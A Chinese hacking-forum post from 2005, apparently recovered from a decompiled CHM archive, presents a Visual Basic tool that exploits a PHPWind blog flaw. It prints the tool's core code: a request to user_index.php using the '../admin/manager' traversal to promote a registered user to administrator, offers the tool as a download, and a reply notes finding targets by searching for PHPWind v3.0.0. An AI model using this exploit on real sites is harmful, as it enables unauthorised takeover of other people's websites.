VB写的phpwindblog漏洞利用工具

作业都做完了吗

[原创]VB写的phpwindblog漏洞利用工具
文章标题:[原创]VB写的phpwindblog漏洞利用工具顶部 fhod 发布于:2005-09-2818:46 [楼主][原创]VB写的phpwindblog漏洞利用工具
文章作者:fhod
信息来源:邪恶八进制信息安全团队

玄猫发布的一个漏洞利用工具..后来经过抓包分析..发现其实不用修改管理员密码..直接就可以把注册的用户提升为管理员...接着用VB写了个程序.方便使用.
具体利用程序里有使用说明.

程序主要代码为


Copycode

PrivateSubCommand1_Click()
WebBrowser1.Navigate(url.Text+"/user_index.php?action=../admin/manager&job=submit&username="+user.Text+"&password="+pass.Text+"&check_pwd="+pass.Text)
WebBrowser1.Visible=True
EndSub

PrivateSubCommand2_Click()
End
EndSub

PrivateSubshuoming_Click()
Form2.Show
EndSub




以下是程序运行后的截图:


=800)window.open('www.1mpi.com');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">

=800)window.open('www.1mpi.com');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">

PS:本人在EST的Vir9in贴~~~


[此贴被fhod在2006-09-0518:31重新编辑]
附件:phpwind.rar(10K)下载次数:321顶部 高兴 发布于:2006-08-3009:55 [1楼]

Quote:
这里是引用第[3楼]的starjason于2006-08-2923:16发表的:


针对什么版本啊?
百度
PoweredbyPHPWindv3.0.0


[此贴被高兴在2006-08-3011:44重新编辑](c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:www.1mpi.com


VB写的phpwindblog漏洞利用工具相关文档

最新文档

返回顶部